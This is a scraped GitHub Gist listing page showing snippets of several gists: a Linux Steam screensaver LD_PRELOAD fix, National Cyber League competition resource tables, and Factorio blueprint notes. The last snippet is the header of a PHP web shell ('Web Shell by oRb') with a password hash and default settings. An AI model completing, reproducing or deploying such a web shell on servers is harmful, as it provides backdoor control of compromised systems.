Skip to content

Instantly share code, notes, and snippets.

View gabevenberg's full-sized avatar

Gabriel Venberg gabevenberg

View GitHub Profile
@InfoTeddy
InfoTeddy / fix_steam_screensaver.c
Created May 22, 2022 06:58
Linux Steam client screensaver issue workaround LD_PRELOAD library, while letting games disable screensaver
/* SPDX-License-Identifier: MIT */
/*
* On Linux, Steam periodically calls SDL_DisableScreenSaver() so your
* screensaver doesn't work with the Steam client open even if you aren't
* playing a game, as described in
* https://github.com/ValveSoftware/steam-for-linux/issues/5607 .
*
* To fix this, LD_PRELOAD a library that replaces SDL_DisableScreenSaver()
* with a no-op if the executable calling it is Steam, but otherwise let it
@TBye101
TBye101 / nclresources.md
Last active July 20, 2025 23:47
NCL Resources and Tips

NCL Resources

Problem Area Resource/Tool Notes
OSINT Hack Control Has links to a scary amount of information gathering tools.
OSINT NCL Twitter/Cyber Kat's Website and Cyber Kat's Twitter In the past hints and even required parts of challenges have been found here
OSINT Sherlock Useful for finding online/social accounts
OSINT QRazyBox Good QR code reconstruction tool
Cryptography CyberChef Good general purpose cyber tool
Cryptography Cryptii Site with various cipher operations
@HactarCE
HactarCE / README.md
Last active June 23, 2021 19:40
Factorio Endgame Production

Unless otherwise specified, all designs are meant for 4-8 trains of the format L-4C-2L-4C-L. Most are also compatible with L-4C-L trains.

"Rail units" refer to the size of MRS blueprints.

ELSA v1

5.2 x 3.5 rail units
Recommended logistics bots: 2000
Configured for iron smelting by default; change all requesters and two arithmetic combinators to use for another resource.

@HactarCE
HactarCE / - Factorio - 4-lane RHD Modular Rail System.md
Last active November 19, 2024 01:22
Factorio - 4-lane RHD Modular Rail System

Factorio Modular Rail System

All blueprints are RHD (right-hand drive)

Modules are 42x42 (big electric poles overlap on neighboring modules)

Included blueprint books:

  • MRS - 2 Lane - RHD - 20 blueprints
  • MRS - 2 Lane Single - RHD - 34 blueprints
  • MRS - 4 Lane - RHD - 25 blueprints
@HactarCE
HactarCE / README.md
Last active November 28, 2024 14:11
Factorio blueprint book list

This is just a collection of useful Factorio blueprint books I have either found online or made myself. (Links are included where applicable.) I recommend using this Chrome extension to quickly copy these into Factorio.

All blueprints use blue belts unless stated otherwise.

See also:

<?php # Web Shell by oRb
//$auth_pass = "63a9f0ea7bb98050796b649e85481845";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;